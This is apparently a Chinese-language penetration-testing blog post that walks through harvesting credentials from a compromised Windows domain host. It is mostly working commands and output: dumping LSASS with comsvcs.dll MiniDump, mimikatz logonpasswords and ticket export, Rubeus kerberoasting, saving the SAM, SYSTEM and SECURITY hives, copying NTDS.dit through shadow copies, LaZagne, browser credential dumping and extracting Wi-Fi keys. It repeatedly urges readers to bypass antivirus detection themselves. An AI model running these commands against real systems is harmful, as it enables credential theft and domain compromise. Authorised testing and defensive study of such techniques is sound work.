在渗透测试过程中,我们终究会遇到攻陷了某台加域Windows主机的情况。而这种情况下,我们很需要搜集当前主机的凭证信息。为进一步利用这些相互信任的凭证来进行横向打下基础。
lsass.exe的DMP文件提取凭证
lsass.exe是Windows主机中对于凭证管理的非常重要的进程,所以它的内存当中通常会包含我们想知道的东西。所以我们的主要目的就是获取他的内存。
有桌面情况下获取lsass内存
打开任务管理器,找到local security auth...
点击创建内存转储文件
OK,you got it 就是这么简单
后面的步骤就是将咱们的转储文件送到VPS上然后使用pypykatz进行解析。解析办法再后面的小节说,而传送方法呢参考之前的文章渗透测试--Windows系统下的文件传输手段-CSDN博客。
cmd情况下获取lsass
我们可以通过rundll32.exe来完成cmd情况下的DMP文件获取。值得一提的是rundll32.exe在现代检查工具中是恶意软件。
找到LSASS PID
tasklist /svcPS C:\Windows\system32> Get-Process lsassPowershell创建DMP文件
下面的命令是恶意活动,需要自行想办法逃避AV检查
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full下面的命令是恶意活动,需要自行想办法逃避AV检查
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full后面的步骤就是将咱们的转储文件送到VPS上然后使用pypykatz进行解析。解析办法再后面的小节说,而传送方法呢参考之前的文章渗透测试--Windows系统下的文件传输手段-CSDN博客。
解析lsass
解析就是这么简单,pypykatz一般kali自带,但是如果无法正常运行就卸载重新安装。
pypykatz lsa minidump /home/peter/Documents/lsass.dmp DMP的内容
解析出来的lsass中通常会包含很多内容,一下是一些举例
MSV
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NAWDIGEST
== WDIGEST [14ab89]==
username bob
domainname DESKTOP-33E7O54
password None
password (hex)Kerberos
== Kerberos ==
Username: bob
Domain: DESKTOP-33E7O54DPAPI
Data protection API ,通常用于给Windows操作系统和第三方应用密码加解密工作。
== DPAPI [14ab89]==
luid 1354633
key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605| Applications | Use of DPAPI |
|---|---|
Internet Explorer | Password form auto-completion data (username and password for saved sites). |
Google Chrome | Password form auto-completion data (username and password for saved sites). |
Outlook | Passwords for email accounts. |
Remote Desktop Connection | Saved credentials for connections to remote machines. |
Credential Manager | Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more. |
自动化手段
nxc smb -u <username> -p <password> --lsalsass的内存窃取凭证
使用mimikatz在Windows内存中搜索凭据
有桌面情况,双击mimikatz,执行命令
privilege::debug
提取NTLMhash
sekurlsa::logonpasswords
cmd情况
mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit使用mimikatz在Windows中提取票证
sekurlsa::tickets /export使用mimikatz在windows中提取Kerberos秘钥
sekurlsa::ekeys使用mimikatz在Windows中提取可破解TGS票证
#开启此命令,防止mimikatz直接将TGT写入.kirbi文件中
mimikatz # base64 /out:true
#展示所有TGT票据
mimikatz # kerberos::list /export
#复制其中的Base64编码并针对性创建.kirbi文件
cmundy2@htb[/htb]$ echo "<base64 blob>" | tr -d \\n
cmundy2@htb[/htb]$ cat encoded_file | base64 -d > sqldev.kirbi
#转义到john破解
python2.7 kirbi2john.py sqldev.kirbi
#转义到hashcat破解
cmundy2@htb[/htb]$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat使用Rubeus提取TGS票证
c:\tools> Rubeus.exe dump /nowrap
#展示当前内存中的票据
c:\tools> Rubeus.exe klist /nowrap使用Rubeus 提取特权账户TGS票证
#获取TGS票证
PS C:\htb> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
#获取TGS票证,加密方式强制为RC4
PS C:\Users\htb-student\Desktop>.\Rubeus.exe kerbperoast /tgtdeleg /user:testspn/nowrap
lazagne.exe自动化搜索凭据
该程序是恶意程序,AV检测会被检出,请各位自己大显身手免杀吧
Release Release v2.4.6 · AlessandroZ/LaZagne · GitHub
C:\Users\bob\Desktop> start lazagne.exe allsam数据库提取凭证
sam数据库中也存在很多凭证,一般是工作组主机才会有用它。想要得到它,我们需要管理员权限,然后从注册表提取它。
%SystemRoot%/system32/config/SAMHKLM/SAM
###icacl查看SAM访问权限
C:\htb> icacls c:\Windows\System32\config\SAM复制SAM数据库
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
传送SAM数据库文件
渗透测试--Windows系统下的文件传输手段-CSDN博客
解析sam数据库
值得一提的是system是非常重要的点,如果没有system文件我们将无法解密sam数据库。原理如下
| 注册表配置单元 | 描述 |
|---|---|
hklm\sam | 包含与本地帐户密码相关的哈希值。我们需要这些哈希值,以便能够破解它们并获取明文形式的用户帐户密码。 |
hklm\system | 包含系统启动密钥,用于加密 SAM 数据库。我们需要启动密钥来解密 SAM 数据库。 |
hklm\security | 包含域帐户的缓存凭据。我们可能会将此内容放在已加入域的 Windows 目标上,从而受益。 |
从SAM数据库提取hash
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL自动化手段
nxc smb -u <username> -p <password> --sam文件获取凭证
该攻击的原理就比较简单了,就是单纯的找配置文件,快速信息搜集的过程。这些搜索这些可能可以帮助我们
| Passwords | Passphrases | Keys |
| Username | User account | Creds |
| Users | Passkeys | Passphrases |
| configuration | dbcredential | dbpassword |
| pwd | Login | Credentials |
密码可能存在的地方
- Passwords in Group Policy in the SYSVOL share
- Passwords in scripts in the SYSVOL share
- Password in scripts on IT shares
- Passwords in web.config files on dev machines and IT shares
- unattend.xml
- Passwords in the AD user or computer description fields
- KeePass databases --> pull hash, crack and get loads of access.
- Found on user systems and shares
- Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint
在Windows中搜索配置文件
###以内容进行筛选
C:\ findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
#仅显示文件名
C:\htb> cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt
stuff.txt
#打印匹配到的行
C:\htb> findstr /si password *.xml *.ini *.txt *.config
stuff.txt:password: l#-x9r11_2_GL!
#匹配所有后缀
C:\htb> findstr /spin "password" *.*
stuff.txt:1:password: l#-x9r11_2_GL!
#powershell实现
PS C:\htb> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
stuff.txt:1:password: l#-x9r11_2_GL!
###以文件名进行筛选
dir /b /s *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.7z *.db *.tar.gz *.tar *.zip *.7z *.tar *.tar.gz *.zip *.rar *.gz *.bz2 *.xz *.tar.xz *.tar.bz2 *.iso *.img *.cab *.tgz *.zst *.lzma *.arj *.apk *.deb *.rpm *.jar *.war *.ear *.cpio *.vhd *.vhdx *.dmg *.sitx *.lz4 *.hqx *.ace *.cbr *.cbz
#压缩文件
dir /b /s *.7z *.tar.gz *.tar *.zip *.7z *.tar *.tar.gz *.zip *.rar *.gz *.bz2 *.xz *.tar.xz *.tar.bz2 *.iso *.img *.cab *.tgz *.zst *.lzma *.arj *.apk *.deb *.rpm *.jar *.war *.ear *.cpio *.vhd *.vhdx *.dmg *.sitx *.lz4 *.hqx *.ace *.cbr *.cbz
#配置文件
dir /b /s *.ini *.conf *.cfg *.yaml *.yml *.json *.xml *.toml *.env *.properties *.cnf *.plist *.htaccess *.config *.desktop *.reg *.prefs *.rc *.srv *.lst *.options *.txt *.bashrc *.zshrc *.profile *.gitconfig *.npmrc *.editorconfig
#用户笔记文件
*.md *.txt *.doc *.docx *.rtf *.odt *.log *.nfo *.html *.xml *.json *.yaml *.yml *.csv *.pdf *.note *.journal *.one *.enex *.db *.sqlite *.gdoc *.gslides *.gnotes *.obsidian *.tex *.markdown *.asciidoc
#数据库文件
*.db *.sqlite *.sqlite3 *.sdb *.mdb *.accdb *.ndf *.mdf *.ldf *.sql *.bak *.frm *.ibd *.myd *.myi *.cdb *.gdb *.kdb *.kdbx *.dbf *.ora *.dmp *.dat *.fdb *.nsf *.vdb *.psafe3 *.edb *.log
#脚本文件
*.sh *.bash *.zsh *.ps1 *.psm1 *.bat *.cmd *.vbs *.js *.py *.rb *.pl *.php *.lua *.awk *.sed *.dts *.ks *.reg *.scpt *.command *.ts *.coffee *.racket *.scm *.erl *.tcl *.plg *.html *.css *.json
#
C:\htb> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
c:\inetpub\wwwroot\web.config
#
C:\htb> where /R C:\ *.config
c:\inetpub\wwwroot\web.config
#
PS C:\htb> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 9:59 AM 329 web.config
在Windows中包含内容地搜索
findstr /s /i cred n:\*.*在Powershell中按文件名搜索
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File在Powershell中按内容搜索
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -ListNTDS.dit
域控数据库,里面有域内的所有敏感信息:
- 用户账户(用户名和密码哈希)
- 群组帐户
- 计算机帐户
- 组策略对象
手动获取NTDS.dit
创建NTDS所在盘的VSS
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:从VSS中复制NTDS.dit
*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.ditdiskshadow手动获取NTDS.dit
###执行diskshadow.exe程序
PS C:\htb> diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM
###开启磁盘影子,并将域控的敏感文件夹挂载到影子的E盘
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
###将影子中的ntds.dit文件复制到C盘
PS C:\htb> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copied 16777216 bytes自动化手段
nxc smb -u <username> -p <password> --ntdsInveigh嗅探
在立足点上开启Inveigh嗅探
Chrome
另一个有趣的案例是字典文件。例如,密码等敏感信息可能会被输入到电子邮件客户端或基于浏览器的应用程序中,这些应用程序会用下划线标记无法识别的任何单词。用户可以将这些单词添加到字典中,以避免出现令人分心的红色下划线。
###利用chorme字典
PS C:\htb> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Password1234!
###利用浏览器的缓存凭证,该行为会被记录,所以如果需要隐匿请慎用。
PS C:\htb> .\SharpChrome.exe logins /unprotect
Powershell历史记录
###查找Powershell的历史记录
PS C:\htb> (Get-PSReadLineOption).HistorySavePath
###读取Powershell历史记录
PS C:\htb> gc (Get-PSReadLineOption).HistorySavePath
###批量检索当前用户可查Poweshell历史记录
PS C:\htb> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Powershell凭证
###基本情况,如果开发人员使用了Connect-VC.ps1,并备份了PS凭证xml文件则可以被攻击者利用
# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
###攻击者在bob_adm用户下可以获取明文信息
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword虚拟机文件中
.kdbx, .vmdk, .vdhx, .ppk, etc.
*kdbx* *.vmdk* *.vdhx* *.ppk* *.vbs*
dir /b /s *sqlite* *kdbx* *vmdk* *vdhx* *ppk* StickyNotes DB文件中
类似sqlite*的文件,我们可以下载到攻击机,然后解析他。
解析工具:
Downloads - DB Browser for SQLiteGitHub - RamblingCookieMonster/PSSQLite: PowerShell module to query SQLite databases
PS C:\htb> ls
Directory: C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/25/2021 11:59 AM 20480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
-a---- 5/25/2021 11:59 AM 982 Ecs.dat
-a---- 5/25/2021 11:59 AM 4096 plum.sqlite
-a---- 5/25/2021 11:59 AM 32768 plum.sqlite-shm
-a---- 5/25/2021 12:00 PM 197792 plum.sqlite-wal
###查找sqlite文件
dir /S /B *sqlite*
###宽松执行策略
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
###导入PSSQLite.psd1文件
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
###解析SQLite文件
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
Text
----
\id=de368df0-6939-4579-8d38-0fda521c9bc4 vCenter
\id=e4adae4c-a40b-48b4-93a5-900247852f96
\id=1a44a631-6fff-4961-a4df-27898e9e1e65 root:Vc3nt3R_adm1n!
\id=c450fc5f-dc51-4412-b4ac-321fd41c522a Thycotic demo tomorrow at 10am
###kali解析sqlite文件
#展示所有键值对
cmundy2@htb[/htb]$ strings plum.sqlitecmdkey保存凭证
服务器通常会保存很多用户的凭证,我们可以利用这些凭证来切换自己的身份
###列出保存凭证
C:\htb> cmdkey /list
Target: LegacyGeneric:target=TERMSRV/SQL01
Type: Generic
User: inlanefreight\bob
###利用凭证
PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"密码管理器
keepass的hash
###发现.kdbx文件
dir /s /b *.kdbx
###提取keepass管理器的密码hash
cmundy2@htb[/htb]$ python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
###hashcat或john破解
https://blog.csdn.net/weixin_44368093/article/details/143445069电子邮件
mailsniper可以完成快速的电子邮件预览,我们可以搜索pass、creds、credentials等搜索。
LaZagne自动化搜集
该工具是会被AV检查的,请自行绕过
PS C:\htb> .\lazagne.exe -h
PS C:\htb> .\lazagne.exe allSessionGopher提取协议凭证
###搜索
PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01注册表发现
windows自动登录
###枚举windows自动登录注册表
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
###枚举putty注册表
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
Present REG_DWORD 0x1
HostName REG_SZ
LogFileName REG_SZ putty.log
<SNIP>
ProxyDNS REG_DWORD 0x1
ProxyLocalhost REG_DWORD 0x0
ProxyMethod REG_DWORD 0x5
ProxyHost REG_SZ proxy
ProxyPort REG_DWORD 0x50
ProxyUsername REG_SZ administrator
ProxyPassword REG_SZ 1_4m_th3_@cademy_4dm1n! 无线网络密码
###查看连接过的无线网络
C:\htb> netsh wlan show profile
###检索已经保存的无线密码
C:\htb> netsh wlan show profile ilfreight_corp key=clear其他文件
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
扫一扫
922
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
